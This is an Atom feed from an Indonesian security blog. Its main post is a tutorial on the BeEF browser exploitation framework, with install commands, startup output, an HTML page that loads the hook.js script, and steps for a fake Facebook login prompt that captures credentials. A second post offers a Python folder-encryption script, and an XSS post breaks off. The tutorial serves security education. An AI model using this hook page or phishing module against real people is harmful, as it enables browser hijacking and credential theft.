<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-1191330060666792521</id><updated>2024-11-05T19:11:41.899-08:00</updated><category term="Cyber Security"/><category term="xyber"/><category term="Cyber Attack"/><category term="Note"/><category term="Malware"/><category term="Python"/><category term="Exploit"/><category term="nmap"/><category term="Backdoor"/><category term="BeEF"/><category term="Brute Force"/><category term="C#"/><category term="Decryption"/><category term="Dorks"/><category term="Encryptiom"/><category term="Framework"/><category term="Hijacker"/><category term="Lua"/><category term="Password"/><category term="Phishing"/><category term="RAT"/><category term="Spam"/><category term="Trojan"/><category term="XSS"/><category term="git"/><category term="john the ripper"/><title type='text'>Xyber Note</title><subtitle type='html'>Catatan dunia Cyber Security</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='https://xybernote.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default?redirect=false'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>20</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-1191330060666792521.post-6716454591383932244</id><published>2023-03-26T10:06:00.001-07:00</published><updated>2023-04-05T07:40:18.235-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="BeEF"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Framework"/><category scheme="http://www.blogger.com/atom/ns#" term="Note"/><category scheme="http://www.blogger.com/atom/ns#" term="xyber"/><title type='text'>Mengenal BeEF Framework</title><content type='html'>&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMUBn6NAhIQyU8fmKwoxJbZlTDlha9ShhTzT9A-2J_KdpV8XzeJGCyNqv7KaNiXauCeOx9E_DWs5BpILAlckNbXTo1tJe9hcl0ceR3eJZ-e9BBPBJngL29tM6BoVsT_zjXy4O78st7Mn9O-MNhb50VxyUOus3v_6V9dOIa5UmpuEgz9iVl04qa47Qv/s640/1_fVoOduQkXC7xLD19ZS0WgA.webp&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;378&quot; data-original-width=&quot;640&quot; height=&quot;378&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMUBn6NAhIQyU8fmKwoxJbZlTDlha9ShhTzT9A-2J_KdpV8XzeJGCyNqv7KaNiXauCeOx9E_DWs5BpILAlckNbXTo1tJe9hcl0ceR3eJZ-e9BBPBJngL29tM6BoVsT_zjXy4O78st7Mn9O-MNhb50VxyUOus3v_6V9dOIa5UmpuEgz9iVl04qa47Qv/w640-h378/1_fVoOduQkXC7xLD19ZS0WgA.webp&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;BeEF adalah singkatan dari Browser Exploitation Framework. Alat ini dirancang untuk mengeksplorasi kerentanan di browser dan mengujinya.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Peretasan BeEF melibatkan dan mengaitkan satu atau lebih browser web dan menggunakannya untuk meluncurkan modul perintah untuk menyerang sistem target di dalam browser.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;BeEF bekerja dengan menggunakan file JavaScript bernama hook.js. Tugas penyerang adalah menemukan cara untuk menjalankan JavaScript ini di browser korban.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Setelah dijalankan, dia akan memiliki kendali atas browser mereka dalam berbagai aspek. Ada banyak cara dia bisa mengeksekusi skrip ini. Misalnya, dia dapat membuat halaman phishing dengan pengaitkannya&amp;nbsp; di dalam kode HTML&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kali ini Saya akan mencontohkan dengan menggunakan halam phishing. Untuk tahap awal mari terlebih dahulu menginstall BeEF.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Install BeEF Framework&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;OS Linux diperlukan untuk menginstal BeEF di mesin lokal Anda. Anda dapat langsung menginstal paket dengan perintah berikut:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;blockquote&gt;apt install beef-xss&lt;/blockquote&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Gunakan perintah berikut untuk menjalankan BeEF:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;blockquote&gt;beef-xss&lt;/blockquote&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;background-color: #f9f9f9; font-family: source-code-pro, Menlo, Monaco, &amp;quot;Courier New&amp;quot;, Courier, monospace; font-size: 14px; letter-spacing: -0.308px; white-space: pre-wrap;&quot;&gt;&lt;/span&gt;&lt;blockquote&gt;&lt;span style=&quot;font-family: source-code-pro, Menlo, Monaco, Courier New, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 14px; letter-spacing: -0.308px; white-space: pre-wrap;&quot;&gt;[22:07:06][*] BeEF is loading. Wait a few seconds...
[22:07:09][*] 8 extensions enabled:
[22:07:09]    |   Proxy
[22:07:09]    |   Demos
[22:07:09]    |   XSSRays
[22:07:09]    |   Events
[22:07:09]    |   Admin UI
[22:07:09]    |   Social Engineering
[22:07:09]    |   Network
[22:07:09]    |_  Requester
[22:07:09][*] 303 modules enabled.
[22:07:09][*] 1 network interfaces were detected.
[22:07:09][*] running on network interface: 
[22:07:09]    |   Hook URL: http://127.0.0.1:3000/hook.js
[22:07:09]    |_  UI URL:   http://127.0.0.1:3000/ui/panel
[22:07:09][*] RESTful API key: 43f6880f37e0c0b41b1e98935862bb2cf6a63266
[22:07:09][!] [GeoIP] Could not find MaxMind GeoIP database: 
[22:07:09]    |_  Run geoipupdate to install
[22:07:09][*] HTTP Proxy: http://127.0.0.1:6789
[22:07:09][*] BeEF server started (press control+c to stop)&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;background-color: #f9f9f9; color: #292929; font-family: source-code-pro, Menlo, Monaco, &amp;quot;Courier New&amp;quot;, Courier, monospace; font-size: 14px; letter-spacing: -0.308px; white-space: pre-wrap;&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;Disini kita bisa melihat ada dua link penting, yaitu:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Hook URL: http://127.0.0.1:3000/hook.js&lt;/li&gt;&lt;li&gt;UI URL: http://127.0.0.1:3000/ui/panel&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&quot;Hook URL&quot; adalah JavaScript yang diperlukan untuk dijalankan korban Anda.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&quot;UI URL&quot; adalah antarmuka web untuk BeEF tempat Anda dapat memantau dan melakukan serangan.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Anda dapat mengakses antarmuka web BeEF dengan mengetikkan URL berikut di browser web Anda:&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;blockquote&gt;http://127.0.0.1:3000/ui/panel&lt;/blockquote&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXEN6xvyxMVDC6_31fwHFSrznvOgDFn3jZvSU6alB7D7S7xvOsV3-apd_ZYgxb9F_0eYlrrellTUcM2s9H2Rhmjq3HZkJJVLhjDDf8rut8s9nM3Cgfn15sbG4pDRZ1AM1h0MHxEHr6LiaD9weP6kpKXuCIzl0D9gqj4F2woni66TSJFqrZQ46PAvGC/s640/1_9CRdxPf1u2imzpHpPMh_fg.webp&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;430&quot; data-original-width=&quot;640&quot; height=&quot;430&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXEN6xvyxMVDC6_31fwHFSrznvOgDFn3jZvSU6alB7D7S7xvOsV3-apd_ZYgxb9F_0eYlrrellTUcM2s9H2Rhmjq3HZkJJVLhjDDf8rut8s9nM3Cgfn15sbG4pDRZ1AM1h0MHxEHr6LiaD9weP6kpKXuCIzl0D9gqj4F2woni66TSJFqrZQ46PAvGC/w640-h430/1_9CRdxPf1u2imzpHpPMh_fg.webp&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;Secara default username nya adalah &lt;b&gt;beef&lt;/b&gt; dan password &lt;b&gt;beef&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn0_Ws0NcM_YvnXUlWAVVcoiOkxGaf421P7v0BH8PYPaFvGOxxDbkIkvQ4x-jB69CcXz-WJRlBs0FDRDkj6eRnlG67jQS6uX8lInxl-3l6eQhq5VK49rJZWAM9YEZBryTiVoxxByWIf9BmEbwHbafMW9J4qeRG0GNAN0Ba1k4Gf8sLU441uVDY4TMx/s640/1_U7Gzc-OcYmCDLOETmdrRCw.webp&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;383&quot; data-original-width=&quot;640&quot; height=&quot;384&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn0_Ws0NcM_YvnXUlWAVVcoiOkxGaf421P7v0BH8PYPaFvGOxxDbkIkvQ4x-jB69CcXz-WJRlBs0FDRDkj6eRnlG67jQS6uX8lInxl-3l6eQhq5VK49rJZWAM9YEZBryTiVoxxByWIf9BmEbwHbafMW9J4qeRG0GNAN0Ba1k4Gf8sLU441uVDY4TMx/w640-h384/1_U7Gzc-OcYmCDLOETmdrRCw.webp&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;Setelah berhasil masuk, Anda akan melihat halaman &quot;Getting Started&quot; dengan informasi tentang cara kerja BeEF. Dari sini Anda dapat melihat browser yang hacked/hooked baik online maupun offline.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Kaitkan Browser Target&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Agar browser web menjadi &quot;hook&quot;, Anda memerlukan klien untuk mengunjungi situs web dengan file JavaScript &quot;hook.js&quot;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Jadi, untuk mendemonstrasikan ini saya akan membuat halaman HTML yang sangat dasar untuk memuat file JavaScript. Ini dapat ditempatkan di server web, diletakkan di server file, dikirim melalui email ke seseorang, dll.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;/div&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;div&gt;&lt;div&gt;&amp;lt; html &amp;gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&amp;lt; head &amp;gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&amp;nbsp; &amp;lt; script&amp;nbsp; src = &quot;http://127.0.0.1:3000/hook.js&quot;&amp;nbsp; type = &#39;text/javascript&#39; &amp;gt; &amp;lt;/ script &amp;gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&amp;lt;/ head &amp;gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&amp;lt; body &amp;gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp; &amp;nbsp;Your browser is hooked!&amp;nbsp;&lt;/div&gt;&lt;div&gt;&amp;lt;/body&amp;gt; &amp;lt;/html&amp;gt; _&amp;nbsp;&lt;/div&gt;&lt;div&gt;_ _ _&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpuCgKHJX4DoE6BpDLvjr3d6Y8TLG1tmlg_OxswczMr1oha4-N_ys4Lq4_hKEYzv2OCQm0Fc423ZVG23FBAwo_XSTQEk0rhHhUd8b9Q2_YqKUH2nKVYSkgVe3KVlFoZjT67NheyLD8sNuC5ta1bRgRbKfOrqUbiSmXNh-p2NIY00Vom0E8_tM8kqgr/s640/1_p3dbNEj9936WG6ioI9Kn-w.webp&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;273&quot; data-original-width=&quot;640&quot; height=&quot;274&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpuCgKHJX4DoE6BpDLvjr3d6Y8TLG1tmlg_OxswczMr1oha4-N_ys4Lq4_hKEYzv2OCQm0Fc423ZVG23FBAwo_XSTQEk0rhHhUd8b9Q2_YqKUH2nKVYSkgVe3KVlFoZjT67NheyLD8sNuC5ta1bRgRbKfOrqUbiSmXNh-p2NIY00Vom0E8_tM8kqgr/w640-h274/1_p3dbNEj9936WG6ioI9Kn-w.webp&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;div&gt;Seperti yang Anda lihat, browser online baru telah ditambahkan ke bagian browser terkait.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Sekarang saya memiliki browser yang terhubung, saya dapat menjalankan beberapa modul bawaan dari tab &quot;Perintah/Commands&quot;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Serangan Phishing&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Untuk melakukan serangan phishing dasar, buka Commands &amp;gt; Social Engineering &amp;gt; Pretty Theft di antarmuka web BeEF.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDyV1q7BYdO5U0MIUd46gQHY-A5J8lsfv9gipDIxbuvAbFdEdQ6vSbFCZ9Sh1kghDc90hO5YxSdDcP4Tlrmva1gqx6sMdKUMsaUaXGGJlnmsu1Uiq6Hyx6yFGlyXMFQoDuc-qzK0rWh5v-9RAYU2IyS8n3gKBSLTjo4sPMuZG1mbjFilhg93A7Tre3/s640/1_6ZuJJatRyzoNy8ULYbcoOQ.webp&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;339&quot; data-original-width=&quot;640&quot; height=&quot;340&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDyV1q7BYdO5U0MIUd46gQHY-A5J8lsfv9gipDIxbuvAbFdEdQ6vSbFCZ9Sh1kghDc90hO5YxSdDcP4Tlrmva1gqx6sMdKUMsaUaXGGJlnmsu1Uiq6Hyx6yFGlyXMFQoDuc-qzK0rWh5v-9RAYU2IyS8n3gKBSLTjo4sPMuZG1mbjFilhg93A7Tre3/w640-h340/1_6ZuJJatRyzoNy8ULYbcoOQ.webp&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;div&gt;Klik pada tombol Execute.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Ini akan menyebabkan halaman batas waktu sesi Facebook palsu muncul di halaman web korban, meminta kredensial pengguna.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPl2aREOLZR9jjPMZej4ay7IPBJk4v8PekoBWsjCLfgYCOt-JBOo3aXdf_AQLFy3y37rPSWB9mPJK2ZwAr2QU41sIdkUXc9BHZgYKwN6toFCWRq52J0KtXix1M4ENKVlXPfTwPnNCUvzDqfNAzTbf3lnjFxW63C7sfN-e5GoNGvkUd67qqswNICmgS/s640/1_EXrgg4VPb_W1LMWkyWKWiw.webp&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;390&quot; data-original-width=&quot;640&quot; height=&quot;390&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPl2aREOLZR9jjPMZej4ay7IPBJk4v8PekoBWsjCLfgYCOt-JBOo3aXdf_AQLFy3y37rPSWB9mPJK2ZwAr2QU41sIdkUXc9BHZgYKwN6toFCWRq52J0KtXix1M4ENKVlXPfTwPnNCUvzDqfNAzTbf3lnjFxW63C7sfN-e5GoNGvkUd67qqswNICmgS/w640-h390/1_EXrgg4VPb_W1LMWkyWKWiw.webp&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;Dan kemudian Saya akan memasukkan beberapa kredensial palsu.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVSs93VFh1MPKoZpAJ4SFsVqtSU_Q7pFQecywPwM3LY0c1pwX5sy2gA2nz4Sm_gOT4X0GXUX8r3FxK3ALk2PnEEospYcMe-UY8nCFKE4Pb-QC6xC7qNAGAswCA6e7iCtLETMGZCQUQyqP87IZKKOIfYpa1eqr7kqE1f-2cExYZK8gj5n-Ad4EFM_0X/s640/1_WpdxmWNyYEA1dvnY3tciOQ.webp&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;341&quot; data-original-width=&quot;640&quot; height=&quot;342&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVSs93VFh1MPKoZpAJ4SFsVqtSU_Q7pFQecywPwM3LY0c1pwX5sy2gA2nz4Sm_gOT4X0GXUX8r3FxK3ALk2PnEEospYcMe-UY8nCFKE4Pb-QC6xC7qNAGAswCA6e7iCtLETMGZCQUQyqP87IZKKOIfYpa1eqr7kqE1f-2cExYZK8gj5n-Ad4EFM_0X/w640-h342/1_WpdxmWNyYEA1dvnY3tciOQ.webp&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;Seperti yang Anda lihat “test@zyx” dan “p@ssw0rd” was &lt;b&gt;recorded&lt;/b&gt;!&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;Jadi, BeEF adalah alat yang ampuh untuk mengeksploitasi browser web, dan ini adalah contoh mengapa Anda tidak boleh mengeklik tautan yang mencurigakan. Selain itu, Anda harus sangat berhati-hati dengan apa pun yang muncul di browser Anda.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Informasi ini hanya boleh digunakan untuk memperluas pengetahuan dan bukan untuk menyebabkan serangan berbahaya atau merusak.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/6716454591383932244'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/6716454591383932244'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/2023/03/mengenal-beef-framework.html' title='Mengenal BeEF Framework'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMUBn6NAhIQyU8fmKwoxJbZlTDlha9ShhTzT9A-2J_KdpV8XzeJGCyNqv7KaNiXauCeOx9E_DWs5BpILAlckNbXTo1tJe9hcl0ceR3eJZ-e9BBPBJngL29tM6BoVsT_zjXy4O78st7Mn9O-MNhb50VxyUOus3v_6V9dOIa5UmpuEgz9iVl04qa47Qv/s72-w640-h378-c/1_fVoOduQkXC7xLD19ZS0WgA.webp" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1191330060666792521.post-5185241743495851462</id><published>2023-03-19T09:38:00.003-07:00</published><updated>2023-04-05T07:39:48.996-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Decryption"/><category scheme="http://www.blogger.com/atom/ns#" term="Encryptiom"/><category scheme="http://www.blogger.com/atom/ns#" term="Note"/><category scheme="http://www.blogger.com/atom/ns#" term="Python"/><category scheme="http://www.blogger.com/atom/ns#" term="xyber"/><title type='text'> Python Folder Decryption &amp; Encryption</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN782hKxLty19wIZV9YgaBRSjXoGgP5W5kq-aKHZ528mWNbmjc4zXuABbLsfTdjnCTts56CUwD9tlH2n5KjEF6K-cTRfW-BomEIFhnlf9wy9L3S3fM2ylAFUP8CQkLfHsp_1nAzVWRyhIU8QWC7tmtHdePpj7k10Fzmg5Q-BY8Vp1AOmPtss7huj8n/s1024/AdobeStock_209686850-1024x576-1.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;576&quot; data-original-width=&quot;1024&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN782hKxLty19wIZV9YgaBRSjXoGgP5W5kq-aKHZ528mWNbmjc4zXuABbLsfTdjnCTts56CUwD9tlH2n5KjEF6K-cTRfW-BomEIFhnlf9wy9L3S3fM2ylAFUP8CQkLfHsp_1nAzVWRyhIU8QWC7tmtHdePpj7k10Fzmg5Q-BY8Vp1AOmPtss7huj8n/w640-h360/AdobeStock_209686850-1024x576-1.jpeg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;Halo, ini adalah kode yang sangat berguna untuk mendekripsi dan mengenkripsi folder demi keamanan, Anda dapat menggunakan kode ini untuk mengenkripsi data Anda&lt;/p&gt;&lt;p&gt;pip install cryptography&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
 &lt;pre class=&quot;brush:css, brush:html, brush:js, brush:php, brush:sql, brush:python&quot;&gt;import base64

from cryptography.hazmat.backends import default_backend

from cryptography.hazmat.primitives import hashes

from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC

from cryptography.fernet import Fernet

from cryptography.fernet import InvalidToken

import os



def encrypt_folder(folder, password):

    salt = os.urandom(16)

    kdf = PBKDF2HMAC(

        algorithm=hashes.SHA256,

        iterations=100000,

        salt=salt,

        length=32,

        backend=default_backend()

    )

    key = base64.urlsafe_b64encode(kdf.derive(password))

    fernet = Fernet(key)

    for root, dirs, files in os.walk(folder):

        for filename in files:

            file_path = os.path.join(root, filename)

            with open(file_path, &quot;rb&quot;) as file:

                data = file.read()

            encrypted_data = fernet.encrypt(data)

            with open(file_path, &quot;wb&quot;) as file:

                file.write(encrypted_data)

    with open(&quot;salt.bin&quot;, &quot;wb&quot;) as f:

        f.write(salt)



def decrypt_folder(folder, password):

    try:

        with open(&quot;salt.bin&quot;, &quot;rb&quot;) as f:

            salt = f.read()

        kdf = PBKDF2HMAC(

            algorithm=hashes.SHA256,

            iterations=100000,

            salt=salt,

            length=32,

            backend=default_backend()

        )

        key = base64.urlsafe_b64encode(kdf.derive(password))

        fernet = Fernet(key)



        for root, dirs, files in os.walk(folder):

            for filename in files:

                file_path = os.path.join(root, filename)

                with open(file_path, &quot;rb&quot;) as file:

                    data = file.read()

                decrypted_data = fernet.decrypt(data)

                with open(file_path, &quot;wb&quot;) as file:

                    file.write(decrypted_data)



    except InvalidToken:

        print(&quot;Error: Invalid password&quot;)

    else:

        print(&quot;Decryption complete!&quot;)







print(&quot;Welcome to the folder encryption/decryption program!&quot;)

print(&quot;1. Encrypt folder&quot;)

print(&quot;2. Decrypt folder&quot;)



choice = input(&quot;Enter your choice: &quot;)



if choice == &quot;1&quot;:

    folder = input(&quot;Enter the folder path: &quot;)

    password = input(&quot;Enter the password: &quot;).encode()

    encrypt_folder(folder, password)

    print(&quot;Encryption complete!&quot;)



elif choice == &quot;2&quot;:

    folder = input(&quot;Enter the folder path: &quot;)

    password = input(&quot;Enter the password: &quot;).encode()

    decrypt_folder(folder, password)





else:

    print(&quot;Invalid choice!&quot;)

&lt;/pre&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/5185241743495851462'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/5185241743495851462'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/2023/03/python-folder-decryption-encryption.html' title=' Python Folder Decryption &amp; Encryption'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN782hKxLty19wIZV9YgaBRSjXoGgP5W5kq-aKHZ528mWNbmjc4zXuABbLsfTdjnCTts56CUwD9tlH2n5KjEF6K-cTRfW-BomEIFhnlf9wy9L3S3fM2ylAFUP8CQkLfHsp_1nAzVWRyhIU8QWC7tmtHdePpj7k10Fzmg5Q-BY8Vp1AOmPtss7huj8n/s72-w640-h360-c/AdobeStock_209686850-1024x576-1.jpeg" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1191330060666792521.post-7957179621327141897</id><published>2023-03-14T09:08:00.377-07:00</published><updated>2023-04-05T07:39:32.240-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Note"/><category scheme="http://www.blogger.com/atom/ns#" term="XSS"/><category scheme="http://www.blogger.com/atom/ns#" term="xyber"/><title type='text'>Mengenal Serangan Cross Site Scripting [XSS]</title><content type='html'>&lt;div&gt;&lt;b&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a 